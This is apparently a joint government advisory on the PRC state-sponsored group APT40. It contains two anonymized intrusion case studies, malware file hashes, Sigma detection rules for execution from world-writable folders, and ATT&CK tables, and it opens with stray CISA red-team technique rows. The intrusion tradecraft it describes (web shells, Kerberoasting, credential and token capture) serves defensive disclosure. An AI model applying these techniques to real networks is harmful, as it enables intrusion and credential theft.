Gather Victim Org Information: Identity Roles | T1591.004 | CISA’s red team selected specific individuals from the assessed organization and targeted them with phishing payloads. |
Technique Title | ID | Use |
---|---|---|
Application Layer Protocol: Web Protocols | T1071.001 | The red team exploited CVE-2022-21587 and ran a RAT that provided consistent C2 via open Transmission Control Protocol (TCP) ports. |
Non-Standard Port | T1571 | The red team used SSH over ports 80 and/or 443 when establishing outbound C2. |
Proxy: Domain Fronting | T1090.004 | CISA’s red team leveraged domain fronting to redirect and obfuscate their traffic. |
Technique Title | ID | Use |
---|---|---|
Brute Force: Password Cracking | T1110.002 | The red team cracked an account’s password by using a common wordlist. |
OS Credential Dumping: DCSync | T1003.006 | CISA’s red team pulled credentials for the domain via DCSync to gain full access to the domain. |
Unsecured Credentials: Bash History | T1552.003 | The red team obtained a password by searching a user’s bash command history, which provided further unprivileged access throughout the network. |
Technique Title | ID | Use |
---|---|---|
Domain Trust Discovery | T1482 | CISA’s red team inspected the assessed organization’s domain trust relationships through LDAP and identified potential connections in external organizations to which to move laterally. |
File and Directory Discovery | T1083 | The red team data mined numerous internal servers and discovered one misconfigured share that contained plaintext usernames and passwords for several privileged service accounts. |
Technique Title | ID | Use |
---|---|---|
Hijack Execution Flow: Path Interception by PATH Environment Variable | T1574.007 | The red team hijacked the execution flow of a program that used a relative path instead of an absolute path, which enabled the capture of the account’s password. |
Access Token Manipulation: Token Impersonation/Theft | T1134.001 | CISA’s red team impersonated the tokens of current users to exploit valid sessions and bypass the organization’s IDM. |
Access Token Manipulation: Make and Impersonate Token | T1134.003 | CISA’s red team created new tokens and logon sessions for accounts not registered with the IDM to escalate privileges. |
Technique Title | ID | Use |
---|---|---|
Remote Services: SSH | T1021.004 | CISA’s red team used SSH with a valid account to move through the enclave. |
Proxy | T1090 | The red team used a SOCKS proxy to avoid direct connections to their infrastructure and obscure the source of the malicious traffic. |
Use Alternate Authentication Material: Pass the Hash | T1550.002 | The red team’s operations were hindered by the organization’s IDM when it blocked the team's attempts to bypass system access controls using different hash types for authentication. |
Use Alternate Authentication Material: Pass the Ticket | T1550.003 | CISA’s red team’s operations were hindered by the organization’s IDM when it blocked the team’s attempts to bypass system access controls using Kerberos tickets for authentication. |
Technique Title | ID | Use |
---|---|---|
Data from Local System | T1005 | CISA’s red team searched each host for files containing sensitive or interesting information such as password hashes, account information, network configurations, etc. |
Technique Title | ID | Use |
---|---|---|
Scheduled Task/Job: Cron | T1053.003 | The red team used the cron utility to perform task scheduling and execute malicious code within Unix systems at specified times. |
Scheduled Task/Job: At | T1053.002 | CISA’s red team used the at utility to perform task scheduling and execute malicious code within Unix systems at a specified time and date. |
Hijack Execution Flow: AppDomainManager | T1574.014 | The red team executed malicious payloads by hijacking how the .NETAppDomainManager loads assemblies. |
Valid Accounts: Domain Accounts | T1078.002 | CISA’s red team regularly used compromised valid domain accounts managed by Active Directory, giving access to resources of the domain. |
Technique Title | ID | Use |
---|---|---|
Masquerading: Masquerade Task or Service | T1036.004 | The red team enumerated local files and running processes to gather information for their payloads and persistence mechanisms to appear as legitimate activity. |
Obfuscated Files or Information | T1027 | CISA’s red team encrypted, encoded, and obfuscated their executables and C2 channels to evade defenses across the network. |
File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification | T1222.002 | The red team modified file permissions with touch and chmod/chown commands to obfuscate their activity and blend in with other files in the environment. |
Indicator Removal: Timestomp | T1070.006 | CISA’s red team modified file timestamps to hide their operational activity. |
This advisory, authored by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the United States Cybersecurity and Infrastructure Security Agency (CISA), the United States National Security Agency (NSA), the United States Federal Bureau of Investigation (FBI), the United Kingdom National Cyber Security Centre (NCSC-UK), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the German Federal Intelligence Service (BND) and Federal Office for the Protection of the Constitution (BfV), the Republic of Korea’s National Intelligence Service (NIS) and NIS’ National Cyber Security Center, and Japan’s National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and National Policy Agency (NPA)—hereafter referred to as the “authoring agencies”—outlines a People’s Republic of China (PRC) state-sponsored cyber group and their current threat to Australian networks. The advisory draws on the authoring agencies’ shared understanding of the threat as well as ASD’s ACSC incident response investigations.
The PRC state-sponsored cyber group has previously targeted organizations in various countries, including Australia and the United States, and the techniques highlighted below are regularly used by other PRC state-sponsored actors globally. Therefore, the authoring agencies believe the group, and similar techniques remain a threat to their countries’ networks as well.
The authoring agencies assess that this group conduct malicious cyber operations for the PRC Ministry of State Security (MSS). The activity and techniques overlap with the groups tracked as Advanced Persistent Threat (APT) 40 (also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk in industry reporting). This group has previously been reported as being based in Haikou, Hainan Province, PRC and receiving tasking from the PRC MSS, Hainan State Security Department.[1]
The following Advisory provides a sample of significant case studies of this adversary’s techniques in action against two victim networks. The case studies are consequential for cybersecurity practitioners to identify, prevent and remediate APT40 intrusions against their own networks. The selected case studies are those where appropriate remediation has been undertaken reducing the risk of re-exploitation by this threat actor, or others. As such, the case studies are naturally older in nature, to ensure organizations were given the necessary time to remediate.
To download the PDF version of this report, visit the following link.
APT40 has repeatedly targeted Australian networks as well as government and private sector networks in the region, and the threat they pose to our networks is ongoing. The tradecraft described in this advisory is regularly observed against Australian networks.
Notably, APT40 possesses the capability to rapidly transform and adapt exploit proof-of-concept(s) (POCs) of new vulnerabilities and immediately utilize them against target networks possessing the infrastructure of the associated vulnerability. APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies’ countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits. APT40 continues to find success exploiting vulnerabilities from as early as 2017.
APT40 rapidly exploits newly public vulnerabilities in widely used software such as Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021-31207, CVE-2021-26084) and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473). ASD’s ACSC and the authoring agencies expect the group to continue using POCs for new high-profile vulnerabilities within hours or days of public release.
Figure 1: TTP Flowchart for APT40 activity
This group appears to prefer exploiting vulnerable, public-facing infrastructure over techniques that require user interaction, such as phishing campaigns, and places a high priority on obtaining valid credentials to enable a range of follow-on activities. APT40 regularly uses web shells [T1505.003] for persistence, particularly early in the life cycle of an intrusion. Typically, after successful initial access APT40 focuses on establishing persistence to maintain access on the victim’s environment. However, as persistence occurs early in an intrusion, it is more likely to be observed in all intrusions—regardless of the extent of compromise or further actions taken.
Although APT40 has previously used compromised Australian websites as command and control (C2) hosts for its operations, the group have evolved this technique [T1594].
APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors [T1584.008] for its operations in Australia. This has enabled the authoring agencies to better characterize and track this group’s movements.
Many of these SOHO devices are end-of-life or unpatched and offer a soft target for N-day exploitation. Once compromised, SOHO devices offer a launching point for attacks that is designed to blend in with legitimate traffic and challenge network defenders [T1001.003].
This technique is also regularly used by other PRC state-sponsored actors worldwide, and the authoring agencies consider this to be a shared threat. For additional information, see joint advisories People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices and PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure.
APT40 does occasionally use procured or leased infrastructure as victim-facing C2 infrastructure in its operations; however, this tradecraft appears to be in relative decline.
ASD’s ACSC are sharing some of the malicious files identified during the investigations outlined below. These files have been uploaded to VirusTotal to enable the wider network defense and cyber security communities to better understand the threats they need to defend against.
MD5 | Filename | Additional information |
---|---|---|
26a5a7e71a601be991073c78d513dee3 | horizon.jsp | 1 kB | Java Source |
87c88f06a7464db2534bc78ec2b915de | Index_jsp$ProxyEndpoint$Attach.class | 597 B | Java Bytecode |
6a9bc68c9bc5cefaf1880ae6ffb1d0ca | Index_jsp.class | 5 kB | Java Bytecode |
64454645a9a21510226ab29e01e76d39 | Index_jsp.java | 5 kB | Java Source |
e2175f91ce3da2e8d46b0639e941e13f | Index_jsp$ProxyEndpoint.class | 4 kB | Java Bytecode |
9f89f069466b8b5c9bf25c9374a4daf8 | Index_jsp$ProxyEndpoint$1.class | 3 kB | Java Bytecode |
187d6f2ed2c80f805461d9119a5878ac | Index_jsp$ProxyEndpoint$2.class | 1 kB | Java Bytecode |
ed7178cec90ed21644e669378b3a97ec | Nova_jsp.class | 7 kB | Java Bytecode |
5bf7560d0a638e34035f85cd3788e258 | Nova_jsp$TomcatListenerMemShellFromThread.class | 8 kB | Java Bytecode |
e02be0dc614523ddd7a28c9e9d500cff | Nova_jsp.java | 15 kB | Java Source |
ASD’s ACSC are sharing two anonymized investigative reports to provide awareness of how the actors employ their tools and tradecraft.
This report details the findings of the ASD’s ACSC investigation into the successful compromise of the organization’s network between July and September 2022. This investigative report was provided to the organization to summarize observed malicious activity and frame remediation recommendations. The findings indicate the compromise was undertaken by APT40.
In mid-August, the ASD’s ACSC notified the organization of malicious interactions with their network from a likely compromised device being used by the group in late August and, with the organization’s consent, the ASD’s ACSC deployed host-based sensors to likely affected hosts on the organization’s network. These sensors allowed ASD’s ACSC incident response analysts to undertake a thorough digital forensics investigation. Using available sensor data, the ASD’s ACSC analysts successfully mapped the group’s activity and created a detailed timeline of observed events.
From July to August, key actor activity observed by the ASD’s ACSC included:
The investigation uncovered evidence of large amounts of sensitive data being accessed and evidence that the actors moved laterally through the network [T1021.002]. Much of the compromise was facilitated by the group’s establishment of multiple access vectors into the network, the network having a flat structure, and the use of insecure internally developed software that could be used to arbitrarily upload files. Exfiltrated data included privileged authentication credentials that enabled the group to log in, as well as network information that would allow the actors to regain unauthorized access if the original access vector was blocked. No additional malicious tooling was discovered beyond those on the initially exploited machine; however, a group’s access to legitimate and privileged credentials would negate the need for additional tooling. Findings from the investigation indicate the organization was likely deliberately targeted by APT40, as opposed to falling victim opportunistically to a publicly known vulnerability.
In mid-August 2022, the ASD’s ACSC notified the organization that a confirmed malicious IP believed to be affiliated with a state-sponsored cyber group had interacted with the organization’s computer networks between at least July and August. The compromised device probably belonged to a small business or home user.
In late August, the ASD’s ACSC deployed a host-based agent to hosts on the organization’s network which showed evidence of having been impacted by the compromise.
Some artefacts which could have supported investigation efforts were not available due to the configuration of logging or network design. Despite this, the organization’s readiness to provide all available data enabled ASD’s ACSC incident responders to conduct comprehensive analysis and to form an understanding of likely APT40 activity on the network.
In September, after consultation with the ASD’s ACSC, the organization decided to denylist the IP identified in the initial notification. In October, the organization commenced remediation.
Beginning in July, actors were able to test and exploit a custom web application [T1190] running on <webapp>2-ext
, which enables the group to establish a foothold in the network demilitarized zone (DMZ). This was leveraged to enumerate both the network as well as all visible domains. Compromised credentials [T1078.002] were used to query the Active Directory [T1018] and exfiltrate data by mounting file shares [T1039] from multiple machines within the DMZ. The actor carried out a Kerberoasting attack in order to obtain valid network credentials from a server [T1558.003]. The group were not observed gaining any additional points of presence in either the DMZ or the internal network.
The below timeline provides a broad overview of the key phases of malicious actor activity observed on the organization’s network.
July: The actors established an initial connection to the front page of a custom web application [T1190] built for the organization (hereafter referred to as the “web application” or “webapp
”) via a transport layer security (TLS) connection [T1102]. No other noteworthy activity was observed.
July: The actors begin enumerating the web application’s website looking for endpoints[2] to further investigate.
July: The actors concentrate on attempts to exploit a specific endpoint.
July: The actors are able to successfully POST to the web server, probably via a web shell placed on another page. A second IP, likely employed by the same actors, also begins posting to the same URL. The actors created and tested a number of likely web shells.
The exact method of exploitation is unknown, but it is clear that the specific endpoint was targeted to create files on <webapp>2-ext
.
ASD's ACSC believes that the two IP address connections were part of the same intrusion due to their shared interest and initial connections occurring minutes apart.
July: The group continue to conduct host enumeration, looking for privilege escalation opportunities, and deploying a different web shell. The actors log into the web application using compromised credentials for <firstname.surname>@<organisation domain>
.
The actors’ activity does not appear to have successfully achieved privilege escalation on <webapp>2-ext
. Instead, the actors pivoted to network-based activity.
July: The actor tests the compromised credentials for a service account[3] which it likely found hardcoded in internally accessible binaries.
July: The actors deploy the open-source tool Secure Socket Funnelling, which was used to connect out to the malicious infrastructure. This connection is employed to tunnel traffic from the actor's attack machines into the organization’s internal networks, whose machine names are exposed in event logs as they attempt to use the credentials for the service account.
August: The actors are seen conducting a limited amount of activity, including failing to establish connections involving the service account.
August: The actors perform significant network and Active Directory enumeration. A different compromised account is subsequently employed to mount shares[4] on Windows machines within the DMZ, enabling successful data exfiltration.
This seems to be opportunistic usage of a stolen credential on mountable machines in the DMZ. Firewalls blocked the actor from targeting the internal network with similar activity.
August – September: The SSF tool re-established a connection to a malicious IP. The group are not observed performing any additional activities until their access is blocked.
September: The organization blocks the malicious IP by denylisting it on their firewalls.
The MITRE ATT&CK framework is a documented collection of tactics and techniques employed by threat actors in cyberspace. The framework was created by U.S. not-for-profit The MITRE Corporation and functions as a common global language around threat actor behavior.
The ASD’s ACSC assesses the following techniques and tactics to be relevant to the actor’s malicious activity:
T1594 – Search Victim-Owned Websites
The actor enumerated the custom web application’s website to identify opportunities for accessing the network.
T1190 – Exploit Public-Facing Application (regarding exploiting the custom web application)
T1078.002 – Valid Accounts: Domain Accounts (regarding logging on with comprised credentials)
Exploiting internet-exposed custom web applications provided an initial point of access for the actor. The actor was later able to use credentials they had compromised to further their access to the network.
T1059 – Command and Scripting Interpreter (regarding command execution through the web shell)
T1072 – Software Deployment Tools (regarding the actor using open-source tool Secure Socket Funnelling (SSF) to connect to an IP)
T1505.003 – Server Software Component: Web Shell (regarding use of a web shell and SSF to establish access)
T1552.001 – Credentials from Password Stores (regarding password files relating to building management system [BMS])
T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting (regarding attack to gain network credentials)
T1021.002 – Remote Services: SMB Shares (regarding the actor mounting SMB shares from multiple devices)
T1213 – Data from Information Repositories (regarding manuals/documentation found on the BMS server)
T1041 – Exfiltration Over C2 Channel (regarding the actor’s data exfiltration from Active Directory and mounting shares)
This report details the findings of ASD’s ACSC investigation into the successful compromise of the organization’s network in April 2022. This investigation report was provided to the organization to summarize observed malicious activity and frame remediation recommendations. The findings indicate the compromise was undertaken by APT40.
In May 2022, ASD’s ACSC notified an organization of suspected malicious activity impacting the organization’s network since April 2022. Subsequently, the organization informed ASD's ACSC that they had discovered malicious software on an internet‑facing server which provided the login portal for the organization’s corporate remote access solution. This server used a remote access login and identity management product and will be referred to in this report as 'the compromised appliance'. This report details the investigation findings and remediation advice developed for the organization in response to the investigation conducted by the ASD’s ACSC.
Evidence indicated that part of the organization’s network had been compromised by malicious cyber actor(s) via the organization’s remote access login portal since at least April 2022. This server may have been compromised by multiple actors, and was likely affected by a remote code execution (RCE) vulnerability that was widely publicized around the time of the compromise.
Key actor activity observed by the ASD’s ACSC included:
The ASD’s ACSC discovered that a malicious actor had exfiltrated several hundred unique username and password pairs on the compromised appliance in April 2022, as well as a number of multi-factor authentication codes and technical artefacts related to remote access sessions. Upon a review by the organization, the passwords were found to be legitimate. The ASD’s ACSC assesses that the actor may have collected these technical artefacts to hijack or create a remote login session as a legitimate user, and access the organization’s internal corporate network using a legitimate user account.
The ASD’s ACSC determined that the actor compromised appliance(s) which provide remote login sessions for organization staff and used this compromise to attempt to conduct further activity. These appliances consist of three load-balanced hosts where the earliest evidence of compromise was detected. The organization shut down two of the three load-balanced hosts shortly after the initial compromise. As a result, all subsequent activity occurred on a single host. The other servers associated with the compromised appliance were also load-balanced in a similar manner. For legibility, all compromised appliances are referred to in most of this report as a “single appliance.”
The actor is believed to have used publicly known vulnerabilities to deploy web shells to the compromised appliance from April 2022 onwards. Threat actors from the group are assessed to have attained escalated privileges on the appliance. The ASD’s ACSC could not determine the full extent of the activity due to lack of logging availability. However, evidence on the device indicates that an actor achieved the following:
The ASD’s ACSC assesses that the actor would have sought to further the compromise of the organisation network. The artefacts exfiltrated by the actor may have allowed them to hijack or initiate virtual desktop sessions as a legitimate user, possibly as a user of their choice, including administrators. The actor may have used this access vector to further compromise organization services to achieve persistence and other goals.
Other organization appliances within the hosting provider managed environment did not show evidence of compromise.
The host with the compromised appliance provided authentication via Active Directory and a webserver, for users connecting to VDI sessions [T1021.001].
Location | Compromised appliance hostnames (load-balanced) |
Datacentre 1 | HOST1, HOST2, HOST3 |
The appliance infrastructure also included access gateway hosts that provide a tunnel to the VDI for the user, once they possess an authentication token generated and downloaded from the appliance.
There was no evidence of compromise of any of these hosts. However, the access gateway hosts logs showed evidence of significant interactions with known malicious IP addresses. It is likely that this reflected activity that occurred on this host, or network connections with threat actor infrastructure that reached this host. The nature of this activity could not be determined using available evidence but indicates that the group sought to move laterally in the organization’s network [TA0008].
Internal Hosts
The ASD’s ACSC investigated limited data from the internal organization’s network segment. Attempted or successful malicious activity known to have impacted the internal organization’s network segment includes actor access to VDI-related artefacts, the scraping of an internal SQL server [T1505.001], and unexplained traffic observed going from known malicious IP addresses through the access gateway appliances [TA0011].
Using their access to the compromised appliance, the group collected genuine usernames, passwords [T1003], and MFA token values [T1111]. The group also collected JSON Web Tokens (JWTs) [T1528], which is an authentication artefact used to create virtual desktop login sessions. The actor may have been able to use these to create or hijack virtual desktop sessions [T1563.002] and access the internal organization network segment as a legitimate user [T1078].
The actor also used access to the compromised appliance to scrape an SQL server [T1505.001], which resided in the organization’s internal network. It is likely that the actor had access to this data.
Evidence available from the access gateway appliance revealed that network traffic occurred through or to this device from known malicious IP addresses. As described above, this may indicate that malicious cyber actors impacted or utilized this device, potentially to pivot into the internal network.
The below list provides a timeline of key activities discovered during the investigation.
Time | Event |
---|---|
April 2022 | Known malicious IP addresses interact with access gateway host HOST7. The nature of the interactions could not be determined. |
April 2022 |
All hosts, HOST1, HOST2 and HOST3, were compromised by a malicious actor or actors, and web shells were placed on the hosts. A log file was created or modified on HOST2. This file contains credential material likely captured by a malicious actor. The /etc/security/opasswd and /etc/shadow files were modified on HOST1 and HOST3, indicating that passwords were changed. Evidence available on HOST1 suggests that the password for user ‘sshuser’ was changed. |
April 2022 |
HOST2 was shut down by the organization. Additional web shells (T1505.003) were created on HOST1 and HOST3. HOST1experienced SSH brute force attempts from HOST3. A log file was modified (T1070) on HOST3. This file contains credential material (T1078) likely captured by a malicious actor. JWTs were captured (T1528) and output to a file on HOST3. HOST3 was shut down by the organization. All activity after this time occurs on HOST1. |
April 2022 | Additional web shells were created on HOST1 (T1505.003). JWTs were captured and output to a file on HOST1. |
April 2022 |
Additional web shells are created on HOST1 (T1505.003), and a known malicious IP address interacts with the host (TA0011). A known malicious IP address interacts with access gateway host HOST7. |
May 2022 |
A known malicious IP address interacted with access gateway host HOST7 (TA0011). An authentication event for a user is linked to a known malicious IP address in logs on HOST1. An additional web shell is created on this host (T1505.003). |
May 2022 | A script on HOST1 was modified by an actor (T1543). This script contains functionality which would have scraped data from an internal SQL server. |
May 2022 | An additional log file on HOST1 was last modified (T1070). This file contains username and password pairs for the organization network, which are believed to be legitimate (T1078). |
May 2022 | An additional log file was last modified (T1070). This file contains JWTs collected from HOST1. |
May 2022 | Additional web shells were created on HOST1 (T1505.003). On this date, the organization reported the discovery of a web shell with creation date in April 2022 to ASD’s ACSC |
May 2022 | A number of scripts were created on HOST1, including one named Log4jHotPatch.jar. |
May 2022 | The iptables-save command was used to add two open ports to the access gateway host. The ports were 9998 and 9999 (T1572). |
Highlighted below are several tactics and techniques identified during the investigation.
T1190 Exploit public facing application
The group likely exploited RCE, privilege escalation, and authentication bypass vulnerabilities in the remote access login and identity management product to gain initial access to the network.
This initial access method is considered the most likely due to the following:
T1059.004 Command and Scripting Interpreter: Unix Shell
The group successfully exploited the above vulnerabilities may have been able to run commands in a Unix shell available on the affected appliance.
Complete details of the commands run by actors cannot be provided as they were not logged by the appliance.
T1505.003 Server Software Component: Web Shell
Actors deployed several web shells on the affected appliance. It is possible that multiple distinct actors deployed web shells, but that only a smaller number of actors conducted activity using these web shells.
Web shells would have allowed for arbitrary command execution by the actor on the compromised appliances.
T1068 Exploitation for Privilege Escalation
Available evidence does not describe the level of privilege attained by actors. However, using web shells, the actors would have achieved a level of privilege comparable to that of the web server on the compromised appliance. Vulnerabilities believed to have been present on the compromised appliance
would have allowed the actors to attain root privileges.
T1056.003 Input Capture: Web Portal Capture
Evidence on the compromised appliance showed that the actor had captured several hundred username-password pairs, in clear text, which are believed to be legitimate. It is likely that these were captured using some modification to the genuine authentication process which output the credentials to a file.
T1111 Multi-Factor Authentication Interception The actor also captured the value of MFA tokens
corresponding to legitimate logins. These were likely captured by modifying the genuine authentication process to output these values to a file. There is no evidence of compromise of the “secret server’ which stores the unique values that provide for the security of MFA tokens.
T1040 Network Sniffing
The actor is believed to have captured JWTs by capturing HTTP traffic on the compromised appliance. There is evidence that the utility tcpdump was executed on the compromised appliance, which may have been how the actor captured these JWTs.
T1539 Steal Web Session Cookie
As described above, the actor captured JWTs, which are analogous to web session cookies. These could have been reused by the actor to establish further access.
T1046 Network Service Discovery
There is evidence that network scanning utility nmap was executed on the compromised appliance to scan other appliances in the same network segment. This was likely used by the actor to discover other reachable network services which might present opportunities for lateral movement.
Available evidence does not reveal how actors collected data or exactly what was collected from the compromised appliance or from other systems. However, it is likely that actors had access to all files on the compromised appliance, including the captured credentials [T1003], MFA token values [T1111], and JWTs described above.
T1071.001 Application Layer Protocol: Web Protocols
Actors used web shells for command and control. Web shell commands would have been passed over HTTPS using the existing web server on the appliance [T1572].
T1001.003 Data Obfuscation: Protocol Impersonation
Actors used compromised devices as a launching point for attacks that are designed to blend in with legitimate traffic.
The ASD’s ACSC strongly recommends implementing the ASD Essential Eight Controls and associated Strategies to Mitigate Cyber Security Incidents. Below are recommendations for network security actions that should be taken to detect and prevent intrusions by APT40, followed by specific mitigations for four key TTPs summarized in Table 1.
Some of the files identified above were dropped in locations such as C:UsersPublic* and C:Windows Temp*. These locations can be convenient spots for writing data as they are usually world writable, that is, all user accounts registered in Windows have access to these directories and their subdirectories. Often, any user can subsequently access these files, allowing opportunities for lateral movement, defense evasion, low-privilege execution and staging for exfiltration.
The following Sigma rules look for execution from suspicious locations as an indicator of anomalous activity. In all instances, subsequent investigation is required to confirm malicious activity and attribution.
Title: World Writable Execution - TempID: d2fa2d71-fbd0-4778-9449-e13ca7d7505c Description: Detect process execution from C: WindowsTemp. Background: This rule looks specifically for execution out of C: WindowsTemp*. Temp is more broadly used by benign applications and thus a lower confidence malicious indicator than execution out of other world writable subdirectories in C:Windows. Removing applications executed by the SYSTEM or NETWORK SERVICE users substantially reduces the quantity of benign activity selected by this rule. This means that the rule may miss malicious executions at a higher privilege level but it is recommended to use other rules to determine if a user is attempting to elevate privileges to SYSTEM. Investigation:
References: Process Execution from an Unusual Directory Author: ASD’s ACSC Date: 2024/06/19 Status: experimental Tags:
Log Source: category: process_creation Detection: temp: common_temp_path: system_user:
dismhost:
known_parent:
condition: temp and not (common_temp_path or system_user or dismhost or known_parent) False positives:
Level: low |
Title: World Writable Execution - Non-Temp System SubdirectoryID: 5b187157-e892-4fc9-84fc-aa48aff9f997 Description: Detect process execution from a world writable location in a subdirectory of the Windows OS install location. Background: This rule looks specifically for execution out of world writable directories within C: and particularly C:Windows*, with the exception of C:WindowsTemp (which is more broadly used by benign applications and thus a lower confidence malicious indicator). AppData folders are excluded if a file is run as SYSTEM - this is a benign way in which many temporary application files are executed. After completing an initial network baseline and identifying known benign executions from these locations, this rule should rarely fire. Investigation:
References: mattifestation / WorldWritableDirs.txt Author: ASD’s ACSC Date: 2024/06/19 Status: experimental Tags:
Log source: category: process_creation Detection: writable_path:
appdata: False positives: Allowlist auditing applications have been observed running executables from these directories. It is plausible that scripts and administrative tools used in the monitored environment(s) may be located in one of these directories and should be addressed on a case-by-case basis. Level: high |
Title: World Writable Execution - UsersID: 6dda3843-182a-4214-9263-925a80b4c634 Description: Detect process execution from C:UsersPublic* and other world writable folders within Users. Background: AppData folders are excluded if a file is run as SYSTEM - this is a benign way in which many temporary application files are executed. Investigation:
References: Process Execution from an Unusual Directory Author: ASD’s ACSC Date: 2024/06/19 Status: experimental Tags:
Log source: category: process_creation Detection:
appdata: False positives: It is plausible that scripts and administrative tools used in the monitored environment(s) may be located in Public or a subdirectory and should be addressed on a case-by-case basis. Level: medium |
During ASD’s ACSC investigations, a common issue that reduces the effectiveness and speed of investigative efforts is a lack of comprehensive and historical logging information across a number of areas including web server request logs, Windows event logs and internet proxy logs.
ASD’s ACSC recommends reviewing and implementing their guidance on Windows Event Logging and Forwarding including the configuration files and scripts in the Windows Event Logging Repository and the Information Security Manual’s Guidelines for System Monitoring, to include centralizing logs and retaining logs for a suitable period.
Promptly patch all internet exposed devices and services, including web servers, web applications, and remote access gateways. Consider implementing a centralised patch management system to automate and expedite the process. ASD’s ACSC recommend implementation of the ISM’s Guidelines for System Management, specifically, the System Patching controls where applicable.
Most exploits utilized by the actor were publicly known and had patches or mitigations available.
Organizations should ensure that security patches or mitigations are applied to internet facing infrastructure within 48 hours, and where possible, use the latest versions of software and operating systems.
Network segmentation can make it significantly more difficult for adversaries to locate and gain access to an organizations sensitive data. Segment networks to limit or block lateral movement by denying traffic between computers unless required. Important servers such as Active Directory and other authentication servers should only be able to be administered from a limited number of intermediary servers or “jump servers.” These servers should be closely monitored, be well secured and limit which users and devices are able to connect to them.
Regardless of instances identified where lateral movement is prevented, additional network segmentation could have further limited the amount of data the actors were able to access and extract.
The authoring agencies also recommend the following mitigations to combat APT40 and others’ use of the TTPs below.
TTP | Essential Eight Mitigation Strategies | ISM Controls |
---|---|---|
Initial Access Exploitation of Public-Facing Application |
|
ISM-0140 ISM-1698 ISM-1701 ISM-1921 ISM-1876 ISM-1877 ISM-1905 |
Execution Command and Scripting Interpreter |
|
ISM-0140 ISM-1490 ISM-1622 ISM-1623 ISM-1657 ISM-1890 |
Persistence Server Software Component: Web Shell |
|
ISM-0140 ISM-1246 ISM-1746 ISM-1249 ISM-1250 ISM-1490 ISM-1657 ISM-1871 |
Initial Access / Privilege Escalation / Persistence Valid Accounts |
|
ISM-0140 ISM-0859 ISM-1546 ISM-1504 ISM-1679 |
For additional general detection and mitigation advice, please consult the Mitigations and Detection sections on the MITRE ATT&CK technique web page for each of the techniques identified in the MITRE ATT&CK summary at the end of this advisory.
Australian organizations: visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and to access alerts and advisories.
Canadian organizations: report incidents by emailing CCCS at contact@cyber.gc.ca.
New Zealand organizations: report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.
United Kingdom organizations: report a significant cyber security incident at National Cyber Security Centre (monitored 24 hours) or, for urgent assistance, call 03000 200 973.
U.S. organizations: report incidents and anomalous activity to CISA 24/7 Operations Center at report@cisa.gov or (888) 282-0870 and/or to the FBI via your local FBI field office, the FBI’s 24/7 CyWatch at (855) 292-3937, or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring agencies.
Reconnaissance (TA0043) | |
---|---|
Search Victim-Owned Websites [T1594] | Gather Victim Identity Information: Credentials [T1589.001] |
Active Scanning: Vulnerability Scanning [T1595.002] | Gather Victim Host Information [T1592] |
Search Open Websites/Domains: Search Engines [T1593.002] | Gather Victim Network Information: Domain Properties [T1590.001] |
Gather Victim Identity Information: Email Addresses [T1589.002] |
Resource Development (TA0042) | |
---|---|
Acquire Infrastructure: Domains [T1583.001] | Acquire Infrastructure [T1583] |
Acquire Infrastructure: DNS Server [T1583.002] | Compromise Accounts [T1586] |
Develop Capabilities: Code Signing Certificates [T1587.002] | Compromise Infrastructure [T1584] |
Develop Capabilities: Digital Certificates [T1587.003] | Develop Capabilities: Malware [T1587.001] |
Obtain Capabilities: Code Signing Certificates [T1588.003] | Establish Accounts: Cloud Accounts [T1585.003] |
Compromise Infrastructure: Network Devices [T1584.008] | Obtain Capabilities: Digital Certificates [T1588.004] |
Initial Access (TA0001) | |
---|---|
Valid Accounts [T1078] | Phishing [T1566] |
Valid Accounts: Default Accounts [T1078.001] | Phishing: Spearphishing Attachment [T1566.001] |
Valid Accounts: Domain Accounts [T1078.002] | Phishing: Spearphishing Link [T1566.002] |
External Remote Services [T1133] | Exploit Public-Facing Application [T1190] |
Drive-by Compromise [T1189] |
Execution (TA0002) | |
---|---|
Windows Management Instrumentation [T1047] | Command and Scripting Interpreter: Python [T1059.006] |
Scheduled Task/Job: At [T1053.002] | Command and Scripting Interpreter: JavaScript [T1059.007] |
Scheduled Task/Job: Scheduled Task [T1053.005] | Native API [T1106] |
Command and Scripting Interpreter [T1059] | Inter-Process Communication [T1559] |
Command and Scripting Interpreter: Windows Command Shell [T1059.003] | System Services: Service Execution [T1569.002] |
Command and Scripting Interpreter: PowerShell [T1059.001] | Exploitation for Client Execution [T1203] |
Command and Scripting Interpreter: Visual Basic [T1059.005] | User Execution: Malicious File [T1204.002] |
Command and Scripting Interpreter: Unix Shell [T1059.004] | Command and Scripting Interpreter: Apple Script [T1059.002] |
Scheduled Task/Job: Cron [T1053.003] | Software Deployment Tools [T1072] |
Persistence (TA0003) | |
---|---|
Valid Accounts [T1078] | Server Software Component: Web Shell [T1505.003] |
Office Application Startup: Office Template Macros [T1137.001] | Create or Modify System Process: Windows Service [T1543.003] |
Scheduled Task/Job: At [T1053.002] | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [T1547.001] |
Scheduled Task/Job: Scheduled Task [T1053.005] | Boot or Logon Autostart Execution: Shortcut Modification [T1547.009] |
